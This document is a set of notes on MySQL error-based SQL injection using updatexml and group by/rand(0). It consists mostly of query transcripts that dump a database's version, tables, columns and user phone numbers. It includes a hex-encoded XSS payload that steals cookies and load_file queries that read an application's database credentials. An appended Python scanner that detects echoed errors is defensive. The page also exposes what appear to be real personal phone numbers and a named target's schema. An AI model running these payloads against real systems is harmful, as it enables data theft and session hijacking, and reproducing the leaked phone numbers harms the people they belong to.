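MySQL error-based injection
How does an error message turn into XSS?
A MySQL statement fails and the error is printed on the page, leaking information.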
=========================================================================================================================================================================
* Error method "updatexml": the output length is limited, but it does not need to be combined with union.
- mysql> select updatexml(1, concat(':', 'test'), 1);
ERROR 1105 (HY000): XPATH syntax error: ':test'
- mysql> select updatexml(1, concat(0x3a, 'test'), 1);
ERROR 1105 (HY000): XPATH syntax error: ':test'
- mysql> select updatexml(1, concat(0x5e, 'test'), 1);
ERROR 1105 (HY000): XPATH syntax error: '^test'
- mysql> select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, 'test'),1);
ERROR 1105 (HY000): XPATH syntax error: '^test'
** The 'test' above can be replaced with a subquery or a function.
* group by + rand(0) + having: no length limit, and no need to combine with union.
- mysql> select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);
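ERROR 1062 (23000): Duplicate entry '5.6.21-log~1' for key 'group_key'
* Error method "rand+count+group by": needs to be combined with union.
rand(0) generates the same sequence no matter which machine it runs on or how many times it is run.
See the bug reported in the MySQL developer community: http://bugs.mysql.com/bug.php?id=8652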
- mysql> select 1,2,count(*),concat('test', char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'test^1' for key 'group_key'
- mysql> select 1,2,count(*),concat('test', char(0x5e), left(rand(0),3))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'test^0.7' for key 'group_key'
** The 'test' above can be replaced with a subquery or a function.
MySQL-to-XSS statement
mysql> select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '/><img src="fuck" onerror=alert(document.cookie)>^0.7' for key 'group_key'
Dumping the configuration file password directly, provided the account has the FILE privilege
mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);
ERROR 1105 (HY000): XPATH syntax error: ': 'DB_NAME' => 'fan******un','
mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);
ERROR 1105 (HY000): XPATH syntax error: ': 'DB_USER' => 's*********b', /'
mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);
ERROR 1105 (HY000): XPATH syntax error: ':PWD' => 'hahahaahhah','
Dumping the version
mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry '5.6.21-log1' for key 'group_key'
Dumping the database name
mysql> select info();
ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist
mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'fangjiangjun^1' for key 'group_key'
Dumping table names
mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS^1' for key 'group_key'
mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'COLLATIONS^1' for key 'group_key'
mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'COLLATION_CHARACTER_SET_APPLICABILITY^1' for key 'group_key'
mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'f_admin^1' for key 'group_key'
mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'f_admin_role^1' for key 'group_key'
Dumping column names
mysql> select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'id^1' for key 'group_key'
mysql> select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'login_time^1' for key 'group_key'
Dumping column values
mysql> select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '18602029479^1' for key 'group_key'
mysql> select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '15602267509^1' for key 'group_key'
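
Every transcript above depends on the application echoing the MySQL error text into the page. The following is an added example, not code from the original notes: a response scanner that finds the two error formats shown here in an HTTP body and reports whether the leaked value reached the page as live markup, compared across three ways of rendering the error. The function names and sample strings are constructed for illustration.

```python
import html
import re
import uuid

# Error texts as they appear in the transcripts on this page. The match is
# greedy because the leaked value may itself contain quotes (see the db.php
# output above); on a line with later quotes it can over-capture.
SIGNATURES = {
    "updatexml/XPATH (1105)": re.compile(r"XPATH syntax error: '(?P<leak>.*)'"),
    "group by/rand (1062)": re.compile(r"Duplicate entry '(?P<leak>.*)' for key 'group_key'"),
}
MARKUP = re.compile(r"<[A-Za-z/!]")


def find_leaks(body):
    """Return (signature, leaked_value, live_markup) for each MySQL error echoed in body."""
    text = html.unescape(body)  # also catch errors that were HTML-escaped on output
    hits = []
    for name, rx in SIGNATURES.items():
        for m in rx.finditer(text):
            leak = m.group("leak")
            # Markup is "live" only if it reached the page unescaped.
            live = bool(MARKUP.search(leak)) and leak in body
            hits.append((name, leak, live))
    return hits


def render_raw(err):        # the behaviour these notes rely on: error echoed as-is
    return "<p>" + err + "</p>"


def render_escaped(err):    # stops the XSS, still discloses the data
    return "<p>" + html.escape(err) + "</p>"


def render_generic(err, server_log):
    """Keep the detail in a server-side log; show the client only a reference id."""
    ref = uuid.uuid4().hex[:12]
    server_log.append((ref, err))
    return "<p>Internal error, reference " + ref + "</p>"


# Constructed sample errors in the two formats shown above.
SAMPLE_XPATH = "XPATH syntax error: '^5.6.21-log'"
SAMPLE_DUP = ("Duplicate entry '/><img src=\"x\" onerror=alert(1)>^0.7' "
              "for key 'group_key'")

if __name__ == "__main__":
    log = []
    for render in (render_raw, render_escaped):
        for err in (SAMPLE_XPATH, SAMPLE_DUP):
            print(render.__name__, find_leaks(render(err)))
    print("render_generic", find_leaks(render_generic(SAMPLE_DUP, log)), len(log))
```

HTML-escaping the error removes the script execution but the scanner still reports the leaked value; only the generic page returns no hits.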